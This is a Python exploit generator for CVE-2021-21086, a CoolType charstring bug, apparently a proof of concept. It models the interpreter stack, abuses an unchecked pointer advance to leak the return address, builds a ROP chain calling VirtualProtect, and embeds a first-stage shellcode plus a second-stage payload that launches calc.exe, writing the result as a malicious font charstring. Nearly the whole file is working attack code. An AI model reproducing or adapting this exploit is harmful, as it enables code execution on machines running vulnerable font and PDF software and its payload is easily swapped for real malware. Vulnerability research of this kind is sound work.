import argparse
import binascii
import struct

class Stack():
    """
    A simple class to model the operand stack and part of the call stack.

    Slots ``0`` through ``opStackLast`` model the operand stack; later slots
    model part of the call stack, with slot ``ret`` holding a return address.
    Every instance owns its own storage.
    """

    opStackLast = 47                # Last valid position of the operand stack
    ret = 74                        # Return address position
    retAddress = 0x6F6E72F4         # Hardcoded return address to test gadgets

    def __init__(self):
        # Per-instance state: a class-level list would be shared, and mutated
        # through self.stack[...] = ..., by every Stack instance.
        self.ptr = 0
        self.stack = [None] * (self.ret + 50)
        self.stack[self.ret] = self.retAddress

    def push(self, n):
        """Store ``n`` at the pointer position and advance the pointer by one."""
        assert 0 <= self.ptr < len(self.stack)
        self.stack[self.ptr] = n
        self.ptr += 1

    def pop(self):
        """Move the pointer back by one and return the value stored there."""
        self.ptr -= 1
        assert 0 <= self.ptr < len(self.stack)
        return self.stack[self.ptr]

    def advancePtr(self, n):
        """
        This method allows to advance the stack pointer outside the operand stack boundaries to recreate the bug described in cve-2021-21086.
        """
        assert (self.ptr + n) < len(self.stack)
        self.ptr += n

    def isOut(self):
        """Return True when the pointer is past the last operand stack slot."""
        return self.ptr > self.opStackLast

    def printStatus(self):
        """Print the pointer, whether it is inside the operand stack, and its distance to ``ret``."""
        print("Ptr: {}".format(self.ptr))
        if self.isOut():
            print("Ptr out of OpStack")
        else:
            print("Ptr in OpStack")
        print("Ptr - Ret: {}".format(self.ptr - self.ret))
        print("---------------------------------------------------------------------")

    def print(self):
        """Print every slot as ``(index, hex value)``, or ``(index, None)`` for empty slots."""
        print("Stack")
        print([(i, hex(v)) if v is not None else (i, v) for i, v in enumerate(self.stack)])
        print("---------------------------------------------------------------------")


class TransientArray():
    """
    A simple class to model the transient array.

    The array has ``size`` slots, all initially ``None``. Every instance owns
    its own storage.
    """

    size = 32                       # Number of slots in the transient array

    def __init__(self):
        # Per-instance storage: a class-level list would be shared, and
        # mutated by put(), across every TransientArray instance.
        self.array = [None] * self.size

    def put(self, i, n):
        """Store ``n`` in slot ``i``."""
        assert 0 <= i < self.size
        self.array[i] = n

    def get(self, i):
        """Return the value stored in slot ``i``."""
        assert 0 <= i < self.size
        return self.array[i]

    def print(self):
        """Print every slot as ``(index, hex value)``, or ``(index, None)`` for empty slots."""
        print("Transient Array")
        print([(i, hex(v)) if v is not None else (i, v) for i, v in enumerate(self.array)])
        print("---------------------------------------------------------------------")

class Cooltype():
    """
    Model of the charstring interpreter, including the operations relevant for the exploit.

    Each operation method simulates its effect on ``self.stack`` and
    ``self.transientArray`` and appends the operation's encoding to
    ``self.charstring``. It also implements a four dword write primitive
    (``writeFourDwords``) to ease the exploit development.
    """

    def __init__(self):
        self.stack = Stack()
        self.transientArray = TransientArray()
        # Per-instance output buffer: a class-level bytearray would be shared
        # by every Cooltype instance and accumulate all of their opcodes.
        self.charstring = bytearray()

    def printCharstring(self):
        """Print the charstring assembled so far as hex."""
        print("Charstring:")
        print(binascii.hexlify(self.charstring))
        print("---------------------------------------------------------------------")

    def _escape(self, op):
        """Append a two-byte escape operator: 0x0c followed by ``op``."""
        self.charstring.append(0x0c)
        self.charstring.append(op)

    def write(self, n):
        """
        Push ``n`` onto the modeled stack and append its operand encoding.

        Values ``<= 107`` are encoded as the single byte ``n + 0x8B``. Larger
        values are encoded as ``0xFF`` followed by the four big-endian bytes of
        ``n``. Values below -107 are not supported: their single-byte encoding
        would be negative and ``bytearray.append`` raises.
        """
        # Operands may only be written while the pointer is inside the operand stack.
        assert not self.stack.isOut()
        self.stack.push(n)

        if n <= 107:
            self.charstring.append(n + 0x8B)
        else:
            self.charstring.append(0xFF)
            self.charstring += n.to_bytes(4, "big")

    def put(self):
        """Pop index ``i``, then value ``n``, and store ``n`` in transientArray[i]."""
        i = self.stack.pop()
        n = self.stack.pop()
        self.transientArray.put(i, n)
        self._escape(0x14)

    def get(self):
        """Pop index ``i`` and push transientArray[i]."""
        i = self.stack.pop()
        self.stack.push(self.transientArray.get(i))
        self._escape(0x15)

    def notOp(self):
        """Pop ``n`` and push 1 if ``n == 0``, else 0."""
        n = self.stack.pop()
        self.stack.push(1 if n == 0 else 0)
        self._escape(0x05)

    def callOther(self):
        """
        Pop the other-subroutine number (must be 18) and advance the pointer by 5.

        The unchecked advance is what lets the pointer leave the operand stack.
        """
        i = self.stack.pop()
        assert i == 18
        self.stack.advancePtr(5)
        self._escape(0x10)

    def drop(self):
        """Discard the top value."""
        self.stack.pop()
        self._escape(0x12)

    def neg(self):
        """Replace the top value with its negation."""
        n = self.stack.pop()
        self.stack.push(-n)
        self._escape(0x0e)

    def exch(self):
        """Swap the two top values."""
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(a)
        self.stack.push(b)
        self._escape(0x1c)

    def sub(self):
        """Pop ``a`` (top), then ``b``, and push ``b - a``."""
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(b - a)
        self._escape(0x0b)

    def add(self):
        """Pop ``a`` (top), then ``b``, and push ``b + a``."""
        a = self.stack.pop()
        b = self.stack.pop()
        self.stack.push(b + a)
        self._escape(0x0a)

    def dup(self):
        """Duplicate the top value."""
        n = self.stack.pop()
        self.stack.push(n)
        self.stack.push(n)
        self._escape(0x1b)

    def endchar(self):
        """Append the single-byte endchar operator (0x0e)."""
        self.charstring.append(0x0e)

    def _seekPtr(self, target):
        """
        Move the stack pointer to exactly ``target``.

        Each notOp/get/callOther round advances the pointer by 4:
        - notOp turns the top value into 0 or 1.
        - get replaces that with transientArray[0] or transientArray[1].
        - callOther pops the value (asserted to be 18) and advances by 5.

        This relies on both slots holding 18. Any overshoot is then undone by
        dropping values.
        """
        while self.stack.ptr < target:
            self.notOp()
            self.get()
            self.callOther()

        while self.stack.ptr > target:
            self.drop()

    def writeFourDwords(self, offsetFromRet, firstIndex):
        """
        Write primitive that exploits cve-2021-21086 to copy four consecutive dwords from the transient array to an offset from the return address.

        After writing, it returns the operand stack pointer to its original position.
        It has the side effect of writing 0x00120000 at some positions while it
        advances the pointer out of the operand stack due to the nature of the
        bug being exploited. It also overwrites transientArray[18] with
        ``firstIndex + 3``.

        offsetFromRet: destination offset, in slots, relative to ``stack.ret``.
            Presumably slots ``ret + offsetFromRet`` .. ``+ 3``; verify
            against the callers' offset table.
        firstIndex: transient array index of the first of the four dwords to copy.
        """
        firstOffset = self.stack.ret + offsetFromRet
        lastOffset = firstOffset + 4
        ptrInStack = self.stack.ptr

        # transientArray[18] = firstIndex + 3 (To generate indices)
        self.write(firstIndex + 3)
        self.write(18)
        self.put()

        # Advance the pointer to the last offset
        self._seekPtr(lastOffset)

        # Get last index and generate some ones
        self.notOp()
        self.get()
        self.get()
        self.drop()

        for _ in range(3):
            self.notOp()
            self.get()
            self.get()
            self.notOp()
            self.notOp()
            self.drop()

        # Advance the pointer to the last offset
        self._seekPtr(lastOffset)

        # Subtract to generate the remaining indices
        for _ in range(3):
            self.sub()
            self.neg()
        self.drop()

        # Advance the pointer to the last offset
        self._seekPtr(lastOffset)

        # Get the elements from the transient array
        for _ in range(4):
            self.get()
            self.drop()

        # Restore the pointer to its original position
        while self.stack.ptr != ptrInStack:
            self.drop()

if __name__ == "__main__":
    # Assemble the charstring with the Cooltype model, print the modeled state,
    # and write the result to --output (or print it as hex when omitted).
    ap = argparse.ArgumentParser()
    ap.add_argument("-o", "--output", help='Output filename.')
    args = vars(ap.parse_args())
    
    c = Cooltype()
    # transientArray[0] = 18 & transientArray[1] = 18
    # notOp always yields 0 or 1, so notOp + get then always pushes 18, the
    # value callOther asserts on.
    c.write(18)
    c.write(18)
    c.write(0)
    c.put()
    c.write(1)
    c.put()

    # Advance pointer to return address + 2.
    # The 32 pushes leave ptr at 32. Each notOp/get/callOther round then adds 4,
    # so the pointer lands exactly on ret + 2 = 76 (checked by the assert below).
    for i in range(32):
        c.write(0)

    while c.stack.ptr < c.stack.ret + 2:
        c.notOp()
        c.get()
        c.callOther()

    # Check position to leak return address
    assert c.stack.ptr == c.stack.ret + 2

    # Copy return address to transientArray[18]:
    # notOp/get leave 18 on top, so put pops i = 18 and then n = stack[ret].
    c.notOp()
    c.get()
    c.put()

    # Go back to the operand stack to assemble the ropchain
    # without crashing the interpreter
    while c.stack.ptr > 30:
        c.drop()

    # Put the return address on the operand stack
    c.write(18)
    c.get()

    # Subtract its own offset + 0x10000000.
    # This ensures the gadget offsets are handled correctly
    # by the interpreter, because it shifts small numbers.
    c.write(0x100472F4)
    c.sub()
    c.dup()

    # Assemble the ROP chain by adding each gadget offset
    # plus 0x10000000 to the value computed above.
    # Constants that are not addresses get 0x10000000 added and then
    # subtracted again.

    # transientArray[2] = POP EAX/RETN
    c.dup()
    c.write(0x10178151)
    c.add()
    c.write(2)
    c.put()

    # transientArray[3] = part of jump to first shellcode
    c.write(0xFFFF33E9)
    c.write(3)
    c.put()

    # transientArray[4] = RETN
    c.dup()
    c.write(0x1000100D)
    c.add()
    c.write(4)
    c.put()

    # transientArray[5] = JMP [VirtualProtect]
    c.dup()
    c.write(0x101C5C3B)
    c.add()
    c.write(5)
    c.put()

    # transientArray[6] = 0x321; length
    c.write(0x10000321)
    c.write(0x10000000)
    c.sub()
    c.write(6)
    c.put()

    # transientArray[7] = JMP ESP
    c.dup()
    c.write(0x10005135)
    c.add()
    c.write(7)
    c.put()

    # transientArray[8] = POP EDX/RETN
    c.dup()
    c.write(0x1014534E)
    c.add()
    c.write(8)
    c.put()

    # transientArray[9] = 0x40; PAGE_EXECUTE_READWRITE
    c.write(0x10000040)
    c.write(0x10000000)
    c.sub()
    c.write(9)
    c.put()

    # transientArray[10] = POP ECX/RETN
    c.dup()
    c.write(0x1000103A)
    c.add()
    c.write(10)
    c.put()

    # transientArray[11] = .data section for oldProtect
    c.dup()
    c.write(0x102B8688)
    c.add()
    c.write(11)
    c.put()

    # transientArray[12] = PUSHAD/RETN
    c.dup()
    c.write(0x1015CF90)
    c.add()
    c.write(12)
    c.put()

    # transientArray[13] = part of jump to first shellcode
    c.write(0x100000FF)
    c.write(0x10000000)
    c.sub()
    c.write(13)
    c.put()

    # First shellcode (31 bytes)
    shellcode =  b""
    shellcode += b"\x8B\xBC\x24\xB4\x03\x00\x00\xB8\xEF\xBE\xAD\xDE\xAF"
    shellcode += b"\x75\xFD\x8B\xF7\x8B\xFC\x90\xB9\x00\xFF\xFF\xFF\xF7"
    shellcode += b"\xD9\xF3\xA5\xFF\xE4"

    # transientArray[14:18] = bytes 0-15 of the first shellcode, as little-endian dwords
    for i in range(14, 18):
        shellcodeChunk = int.from_bytes(shellcode[4*(i-14):4*(i-14)+4], byteorder='little', signed=False)
        c.write(shellcodeChunk)
        c.write(i)
        c.put()

    # transientArray[19:23] = bytes 16-31 of the first shellcode (the last chunk is 3 bytes).
    # Slot 18 is skipped because writeFourDwords uses it as scratch.
    for i in range(19, 23):
        shellcodeChunk = int.from_bytes(shellcode[4*(i-15):4*(i-15)+4], byteorder='little', signed=False)
        c.write(shellcodeChunk)
        c.write(i)
        c.put()

    # Use a four dword write primitive to copy the transient
    # array content to the locations needed for the exploit
    # to work. Each (offset, index) pair copies the four dwords starting at
    # transientArray[index] to ret + offset; pairs run from the highest offset down.
    offsets = [-40, -36, 0, 4, 8]
    indices = [14, 19, 2, 6, 10]

    for o,i in reversed(list(zip(offsets, indices))):
        c.writeFourDwords(o, i)

    c.endchar()

    # Second-stage payload, appended after the charstring
    shellcode2 =  b""
    shellcode2 += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    shellcode2 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    shellcode2 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    shellcode2 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    shellcode2 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    shellcode2 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    shellcode2 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    shellcode2 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    shellcode2 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    shellcode2 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    shellcode2 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
    shellcode2 += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
    shellcode2 += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
    shellcode2 += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
    shellcode2 += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

    # Pad with "A" so the 0xDEADBEEF marker dword starts at a multiple of 4 bytes
    # from the start of the charstring.
    # (Adds 4 bytes when the length is already a multiple of 4.)
    padding = bytearray(b"A" *(4 - len(c.charstring) % 4))

    # Layout: charstring | padding | marker dword EF BE AD DE | second-stage payload
    finalCharstring = c.charstring + padding + bytearray(b"\xEF\xBE\xAD\xDE") + shellcode2

    c.transientArray.print()
    c.stack.print()
    c.stack.printStatus()

    # Note: the printed hex (no --output) shows only the charstring,
    # without padding, marker or second-stage payload.
    if args['output']:
        with open(args['output'], "wb") as f:
            f.write(finalCharstring)
    else:
        c.printCharstring()


